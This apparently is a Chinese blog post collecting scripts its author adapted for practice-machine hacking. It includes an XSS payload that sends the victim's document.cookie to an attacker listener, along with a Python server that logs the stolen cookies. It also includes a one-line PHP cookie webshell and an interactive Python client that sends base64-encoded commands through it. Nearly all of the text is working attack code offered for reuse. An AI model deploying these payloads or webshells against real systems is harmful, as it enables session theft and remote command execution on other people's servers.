脚本集合

前言

记录一些打靶机过程中修改的脚本。

xss-cookie-stealer

python3版本，就是一个服务端，实时输出访问日志(弹回来的cookie)

python3 xss-cookie-stealer.py |tee log.txt

原仓库
使用方法
式例如下

<img src=x onerror="this.src='http://192.168.0.18:8888/?'+document.cookie; this.removeAttribute('onerror');">

#!/usr/bin/env python
# POC for cookie stealing through XSS
# Should work with:
# <script>
#   image = new Image();
#   image.src='http://X.X.X.X:8888/?'+document.cookie;
# </script>


from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs
from datetime import datetime


class MyHandler(BaseHTTPRequestHandler):

    def do_GET(self):
        query_components = parse_qs(urlparse(self.path).query)
        print("")
        print("%s - %s\t%s" % (
            datetime.now().strftime("%Y-%m-%d %I:%M %p"),
            self.client_address[0],
            self.headers['user-agent']))
        print("-------------------"*6)
        for k, v in query_components.items():
            print("%s\t\t\t%s" % (k.strip(), v))

        # print query_components
        # self.send_response(500)

        # self.send_header("Content-type", "text/html")
        # self.end_headers()
        # self.wfile.write(c)

        return

    def log_message(self, format, *args):
        return

if __name__ == "__main__":
    try:
        server = HTTPServer(('0.0.0.0', 8888), MyHandler)
        print('Started http server')
        server.serve_forever()
    except KeyboardInterrupt:
        print('^C received, shutting down server')
        server.socket.close()

cookie一句话马客户端

原仓库同上
python3版本，对Windows和Linux的编码做了兼容
例

python cookie.py http://127.0.0.1/cookie_yjh.php

代码

#!/usr/bin/env python
"""
The following code is an alternative for GET and POST methods
as it uses _COOKIE global variable instead.
Should work with:
    <?php system(base64_decode($_COOKIE["param"])); ?>
"""

from urllib.request import build_opener, HTTPHandler
from sys import argv
import base64


def execute(command, agent, debugLevel=0):
    opener = build_opener(HTTPHandler(debuglevel=debugLevel))
    cmd = base64.b64encode(command.encode())
    opener.addheaders = [
        ('User-Agent', agent),
        ('Cookie', 'param={0}'.format(cmd.decode())),
    ]
    sc = opener.open(argv[1])  # 'http://localhost/uploads/co.php'
    #sc = opener.open("http://127.0.0.1/cookie_yjh.php")
    raw_result = sc.read()
    try:
        result = raw_result.decode('utf8').strip()
    except UnicodeDecodeError:
        result = raw_result.decode('gb18030').strip()
    print('\033[31m' + result + '\033[0m')


def main():
    print("[+] Debug Level is set to be 0.")

    agent = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; "
    agent += "WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; "
    agent += ".NET CLR 3.5.30729; .NET CLR 3.0.30729; "
    agent += "Media Center PC 6.0; .NET4.0C; .NET4.0E)"

    while True:

        command = input('shell:$ ')

        if command != 'exit':
            execute(command, agent)
        else:
            break

if __name__ == '__main__':
    main()